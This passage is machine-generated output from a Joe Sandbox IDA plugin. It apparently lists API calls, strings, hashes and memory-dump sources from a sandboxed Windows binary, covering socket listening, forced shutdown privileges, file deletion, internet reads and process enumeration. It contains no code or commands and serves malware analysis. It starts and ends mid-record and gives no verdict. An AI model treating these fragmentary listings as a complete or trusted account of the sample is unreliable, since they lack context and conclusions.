                                                                                                      • Instruction Fuzzy Hash: 67417B35204611AFE310EF15D888F15BBA5EF44358F1884A9E85ACBB62CB35ED42CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D71F53: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D71F9D
                                                                                                        • Part of subcall function 00D71F53: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D71FCA
                                                                                                        • Part of subcall function 00D71F53: GetLastError.KERNEL32 ref: 00D71FDA
                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00D7F15E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                                      • API String ID: 2234035333-3163812486
                                                                                                      • Opcode ID: 6d60bc79402f53fbd6ed26a5224c335502ca33b665ebbfce9439c160a4c60a71
                                                                                                      • Instruction ID: d39a2b966d7ad7d565126d6f1e3e74e140ee205d24f8bd651e34fdf91eae9d58
                                                                                                      • Opcode Fuzzy Hash: 6d60bc79402f53fbd6ed26a5224c335502ca33b665ebbfce9439c160a4c60a71
                                                                                                      • Instruction Fuzzy Hash: 5A01A272610320AAE73467B8DC8ABBF726C9B09350F598931FD5AE21D1F6609D0082B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00D91BD3
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D91BE0
                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00D91C17
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D91C22
                                                                                                      • closesocket.WSOCK32(00000000), ref: 00D91C51
                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00D91C60
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D91C6A
                                                                                                      • closesocket.WSOCK32(00000000), ref: 00D91C99
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                      • String ID:
                                                                                                      • API String ID: 540024437-0
                                                                                                      • Opcode ID: 1bc3ab4080fe06d8e34b03d5a81adacb0abe5139b84b24be52cfee854ae94d81
                                                                                                      • Instruction ID: 38f07a309d0c1dfed8874c9bde61bcae154c2d6951c46b926cdc006f2d2a3b36
                                                                                                      • Opcode Fuzzy Hash: 1bc3ab4080fe06d8e34b03d5a81adacb0abe5139b84b24be52cfee854ae94d81
                                                                                                      • Instruction Fuzzy Hash: 16415D35600211AFDB10DF28D484B6ABBE6EF46318F188198E8569F396C775EC85CBF1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D15558,?,?,00D54B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D1559E
                                                                                                        • Part of subcall function 00D7E9C5: GetFileAttributesW.KERNEL32(?,00D7D755), ref: 00D7E9C6
                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D7DBE0
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D7DC30
                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D7DC41
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D7DC58
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D7DC61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                      • String ID: \*.*
                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                      • Opcode ID: 9f9a7fabf60b12dc20801a6c6168c820506eec6b803066123db3c94c96c2d22d
                                                                                                      • Instruction ID: 1135ed8c99a1a5d407c77284a63de4e931dbb555e3b83c01167c7e2b7e4a5628
                                                                                                      • Opcode Fuzzy Hash: 9f9a7fabf60b12dc20801a6c6168c820506eec6b803066123db3c94c96c2d22d
                                                                                                      • Instruction Fuzzy Hash: 19319031008385ABC301EF64E8819EFB7FABE95310F44495EF4D6921A1EF60DA49CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D5552E,?,?,00000000,00000000), ref: 00D83933
                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D5552E,?,?,00000000,00000000), ref: 00D8394A
                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00D5552E,?,?,00000000,00000000,?,?,?,?,?,?,00D163C2), ref: 00D8395A
                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00D5552E,?,?,00000000,00000000,?,?,?,?,?,?,00D163C2), ref: 00D8396B
                                                                                                      • LockResource.KERNEL32(00D5552E,?,?,00D5552E,?,?,00000000,00000000,?,?,?,?,?,?,00D163C2,?), ref: 00D8397A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                      • String ID: SCRIPT
                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                      • Opcode ID: 03363d77b14ae62c6163ab649be6edd0721e01ce51d137af77683dfc5b30a1cb
                                                                                                      • Instruction ID: 449dfcc4a07846e980cc6f1af2f10daf6bb4c89c6398f192c33e759aeeedc93a
                                                                                                      • Opcode Fuzzy Hash: 03363d77b14ae62c6163ab649be6edd0721e01ce51d137af77683dfc5b30a1cb
                                                                                                      • Instruction Fuzzy Hash: 77117C70201701BFD721AB25DC48F277BBAEBC5B40F148268F446DA650DBB1DD00CA31
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00D8A4D5
                                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00D8A5E8
                                                                                                        • Part of subcall function 00D841CE: GetInputState.USER32 ref: 00D84225
                                                                                                        • Part of subcall function 00D841CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D842C0
                                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00D8A505
                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00D8A5D2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                      • String ID: *.*
                                                                                                      • API String ID: 1972594611-438819550
                                                                                                      • Opcode ID: 3f832422f5f286ee392612e84d089a7037e1533f193b4d34dad93c5531f40271
                                                                                                      • Instruction ID: 4531ac61f9a458d902f9ae033444199664197ab0f8a218675d8d97083df8c36c
                                                                                                      • Opcode Fuzzy Hash: 3f832422f5f286ee392612e84d089a7037e1533f193b4d34dad93c5531f40271
                                                                                                      • Instruction Fuzzy Hash: BC41607190020AAFDF14EFA8D849AEEBBB5EF05310F144097E405A62A1EB359E94CF71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DefDlgProcW.USER32(?,?), ref: 00D122EE
                                                                                                      • GetSysColor.USER32(0000000F), ref: 00D123C3
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00D123D6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Proc
                                                                                                      • String ID:
                                                                                                      • API String ID: 929743424-0
                                                                                                      • Opcode ID: f6674ca0e0ff309f2c6f03969da9868f3606328a5eaf6c821006987360609139
                                                                                                      • Instruction ID: 3b4eadf04eeddde095f0ebade698789586c69bde41ca19ffbd393836c2715d61
                                                                                                      • Opcode Fuzzy Hash: f6674ca0e0ff309f2c6f03969da9868f3606328a5eaf6c821006987360609139
                                                                                                      • Instruction Fuzzy Hash: 188127F1604154BAEA2C663DAC9CEFF294DDB47341F18010DF992C5692CE2BCEA5D236
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D939AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D939D7
                                                                                                        • Part of subcall function 00D939AB: _wcslen.LIBCMT ref: 00D939F8
                                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00D921BA
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D921E1
                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00D92238
                                                                                                      • WSAGetLastError.WSOCK32 ref: 00D92243
                                                                                                      • closesocket.WSOCK32(00000000), ref: 00D92272
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                      • String ID:
                                                                                                      • API String ID: 1601658205-0
                                                                                                      • Opcode ID: 417a1f2c8417ab9ec6e3b65ad96fef7cecf6ab453013be7e246e074ff9110f70
                                                                                                      • Instruction ID: 5205ad6d960138a4d21fc2abddaca6acb8cc6d6a607867157e6a9efc52cc53cb
                                                                                                      • Opcode Fuzzy Hash: 417a1f2c8417ab9ec6e3b65ad96fef7cecf6ab453013be7e246e074ff9110f70
                                                                                                      • Instruction Fuzzy Hash: 6B51A075A00210AFDB10AF64D886F6A77A5EF05718F088048F956AF393CA71AD418BF1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                      • String ID:
                                                                                                      • API String ID: 292994002-0
                                                                                                      • Opcode ID: f273ce77d867ac5eaf8f34d04038a62594a152196a3427d5cdf70c2c09f5b009
                                                                                                      • Instruction ID: aef32b421800b48529344dd0df251b79901c8a1389fc0a4d01404a408fb5ca9a
                                                                                                      • Opcode Fuzzy Hash: f273ce77d867ac5eaf8f34d04038a62594a152196a3427d5cdf70c2c09f5b009
                                                                                                      • Instruction Fuzzy Hash: 1521BF317012509FD7108F1AD854B6A7BA6FF96324F1C8468E88ACB251DB71ED42CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00D9B00B
                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00D9B019
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00D9B0FB
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9B10A
                                                                                                        • Part of subcall function 00D2E2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D54D4D,?), ref: 00D2E30F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1991900642-0
                                                                                                      • Opcode ID: a9ed5da8367207b95b853ee70d3defa531a344a2238b276ff128023e0f211659
                                                                                                      • Instruction ID: d9a941fcea42c63218ad7f174ccb279cb673098b30ad455fe9db666b083cb2cc
                                                                                                      • Opcode Fuzzy Hash: a9ed5da8367207b95b853ee70d3defa531a344a2238b276ff128023e0f211659
                                                                                                      • Instruction Fuzzy Hash: B9514A71508300AFC710EF64E885A9BBBE8FF99754F00491EF589D7261EB70D904CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00D8D7E6
                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00D8D847
                                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00D8D85B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 234945975-0
                                                                                                      • Opcode ID: f1549f919889da670083e6b7f0f2a19c129c7cfc95a556c99ebf634057ed00cf
                                                                                                      • Instruction ID: b8d2e4e83b820864684e18fc03acedc1ffe146e9fe03edf9d30486a4ffadcb56
                                                                                                      • Opcode Fuzzy Hash: f1549f919889da670083e6b7f0f2a19c129c7cfc95a556c99ebf634057ed00cf
                                                                                                      • Instruction Fuzzy Hash: 5721AF71900304AFEB20AFA5D988BAB77FEEF40314F14442AE146D25D1E774EA04CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00D85B34
                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00D85B92
                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00D85BFB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                      • String ID:
                                                                                                      • API String ID: 1682464887-0
                                                                                                      • Opcode ID: 534d59d0718983d70defa3a842d18d86b26fd158b72c9415e9e529cc83f7d1d9
                                                                                                      • Instruction ID: e397f4e4b022f1ecb6a1ceef43178153fdc98f2e974b258eb7e445cd4e62852c
                                                                                                      • Opcode Fuzzy Hash: 534d59d0718983d70defa3a842d18d86b26fd158b72c9415e9e529cc83f7d1d9
                                                                                                      • Instruction Fuzzy Hash: 76312B75A00618EFDB00EF54D884BEDBBB5FF09314F188099E8459B366DB31E855CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00D71F1C
                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D71F31
                                                                                                      • FreeSid.ADVAPI32(?), ref: 00D71F41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 3429775523-0
                                                                                                      • Opcode ID: 33fd048b289669d58b5d603eaafc057be9c127105238457a500511f013cb4e48
                                                                                                      • Instruction ID: f8086192b73901ceaefb1b3599dd2774294ccf63027bf86f6b5fed675dcabc3b
                                                                                                      • Opcode Fuzzy Hash: 33fd048b289669d58b5d603eaafc057be9c127105238457a500511f013cb4e48
                                                                                                      • Instruction Fuzzy Hash: 48F0177595030DBBDF00DFE4DC89AAEBBBDFB04700F5084A5E902E2281E774AA448B24
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00D7EC19
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: mouse_event
                                                                                                      • String ID: DOWN
                                                                                                      • API String ID: 2434400541-711622031
                                                                                                      • Opcode ID: bd4567474283cfd67aafd17ed790fb0b7732b738a4dfc1aab481520383f4a683
                                                                                                      • Instruction ID: 49741514dcec362fae51f36ee8b61bda60b99833babf3917f00d15a4f5cec08f
                                                                                                      • Opcode Fuzzy Hash: bd4567474283cfd67aafd17ed790fb0b7732b738a4dfc1aab481520383f4a683
                                                                                                      • Instruction Fuzzy Hash: 56E08C6A19D7223CB9082118BD06DF6038CCF2A334B55829BF845E42C0FD946D8660B9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00D6E60A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameUser
                                                                                                      • String ID: X64
                                                                                                      • API String ID: 2645101109-893830106
                                                                                                      • Opcode ID: 9bd8dde44dec7302631bdbc15c1f72104fa7c5a33d377bf7026c73c3a634a11c
                                                                                                      • Instruction ID: 2d577dd9bc1115affa6a64384f7696b5da32e8358feb9f3d7bdd52cf74fd7aa9
                                                                                                      • Opcode Fuzzy Hash: 9bd8dde44dec7302631bdbc15c1f72104fa7c5a33d377bf7026c73c3a634a11c
                                                                                                      • Instruction Fuzzy Hash: 1DD0C9B481112DEBCBA0CB90EC88DDD737CBB14304F100551F146E2100D730D5498B60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00D951EE,?,?,00000035,?), ref: 00D8413E
                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00D951EE,?,?,00000035,?), ref: 00D8414E
                                                                                                      Memory Dump Source
